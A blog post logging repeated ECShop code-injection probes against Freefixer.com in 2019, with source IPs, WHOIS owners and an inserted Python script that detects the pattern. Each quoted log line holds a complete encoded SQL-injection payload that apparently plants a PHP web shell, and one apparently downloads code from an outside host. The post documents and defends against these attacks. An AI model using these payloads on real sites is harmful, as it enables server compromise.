Tag Archives: IP numbers

106.12.54.95 – Code Injection Attempt

Recently I’ve been examining access.log files at Freefixer.com in order to block unnecessary bots and bad behaviour. The following log entry from 106.12.54.95 caught my attention since it looked pretty suspicious. At first glance it appeared to be an attempt to inject SQL code:

106.12.54.95 - - [29/Aug/2019:00:53:55 -0700] "GET /user.php?act=login HTTP/1.1" 404 4695 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

After some further searching I found a software tool called CMS-Hunter that scans for vulnerabilities in many common content management systems. In this case the exploit is for ECShop and it seems to be a PHP code injection exploit. Most likely, the user behind 106.12.54.95 is using CMS-Hunter.
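One way to spot this pattern in an access.log, as an added example and not code from the post: parse Apache combined-format lines, flag requests to user.php?act=login whose Referer carries the serialized PHP array and UNION SELECT seen above, and count hits per client IP. The sample lines are constructed (shortened placeholder payloads, 192.0.2.1 as a benign client).

```python
import re
from collections import Counter

# Apache "combined" log format; the Referer field may contain backslash-escaped quotes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Markers from the probes above: a fixed hash prefix, a serialized PHP array and
# an SQL UNION, all carried in the Referer of a request to user.php?act=login
REFERER_PREFIX = "554fcae493e564ee0dc75bdf2ebf94caads|a:"
UNION_RE = re.compile(r"union\s+select", re.IGNORECASE)


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_ecshop_probe(entry):
    """True when a parsed entry matches the user.php Referer-injection pattern."""
    referer = entry["referer"]
    return ("user.php?act=login" in entry["request"]
            and referer.startswith(REFERER_PREFIX)
            and UNION_RE.search(referer) is not None)


def probing_ips(lines):
    """Count matching requests per client IP, most active first (candidates to block)."""
    hits = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry and is_ecshop_probe(entry):
            hits[entry["ip"]] += 1
    return hits.most_common()


# Constructed sample: two probes with the hex payload replaced by a placeholder, one normal hit
SAMPLE_LOG = [
    r'''106.12.54.95 - - [29/Aug/2019:00:53:55 -0700] "GET /user.php?act=login HTTP/1.1" 404 4695 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,0xPLACEHOLDER,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"''',
    r'''112.114.100.146 - - [31/Aug/2019:10:57:11 -0700] "GET /user.php?act=login HTTP/1.1" 404 413 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,0xPLACEHOLDER,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"''',
    r'''192.0.2.1 - - [01/Sep/2019:12:00:00 -0700] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"''',
]

if __name__ == "__main__":
    for ip, count in probing_ips(SAMPLE_LOG):
        print(f"{ip}\t{count}")
```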

106.12.54.95 is owned by China Beijing Beijing Baidu Netcom Science And Technology Co. Ltd. They own the following IP range: 106.12.0.0 – 106.13.255.255.

I’ve also noticed the same behaviour from 112.114.100.146, Yunnan China:

112.114.100.146 - - [31/Aug/2019:10:57:11 -0700] "GET /user.php?act=login HTTP/1.1" 404 413 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

The same thing is also happening from 112.114.103.183, Yunnan China:

112.114.103.183 - - [03/Sep/2019:00:41:00 -0700] "GET /user.php?act=login HTTP/1.1" 404 4222 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

Update September 6, 2019: Same type of traffic from 103.216.154.138, Beijing China:

103.216.154.138 - - [05/Sep/2019:16:01:51 -0700] "GET /user.php?act=login HTTP/1.1" 404 413 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

Update 9 Sep 2019: The same type of requests are now coming from 112.114.107.49:

112.114.107.49 - - [06/Sep/2019:09:56:17 -0700] "GET /user.php?act=login HTTP/1.1" 404 4220 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

Update 19 Sep 2019: Same type of hacking attempt from 14.116.38.119. The whois reports “China Zhuhai Chinanet Guangdong Province Network” as the owner of this IP.

14.116.38.119 - - [19/Sep/2019:21:03:32 -0700] "GET /user.php?act=login HTTP/1.1" 404 3708 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:372:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b246161616161616161275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a323875634768774a79776e623273354f4455774d6963755a6d6c735a56396e5a585266593239756447567564484d6f4a326830644841364c7938784f5449754d5467324c6a45314c6a497a4f6a6b344c3252354c6d70775a7963704b54733d2729293b2f2f7d,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"

Update 20 Sep 2019: Another hacking attempt, and this time from 114.116.251.212. China Beijing Huawei Public Cloud Service and Huawei Cloud Service data center shows up in the WHOIS results.

114.116.251.212 - - [20/Sep/2019:01:21:22 -0700] "GET /user.php?act=login HTTP/1.1" 404 4221 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"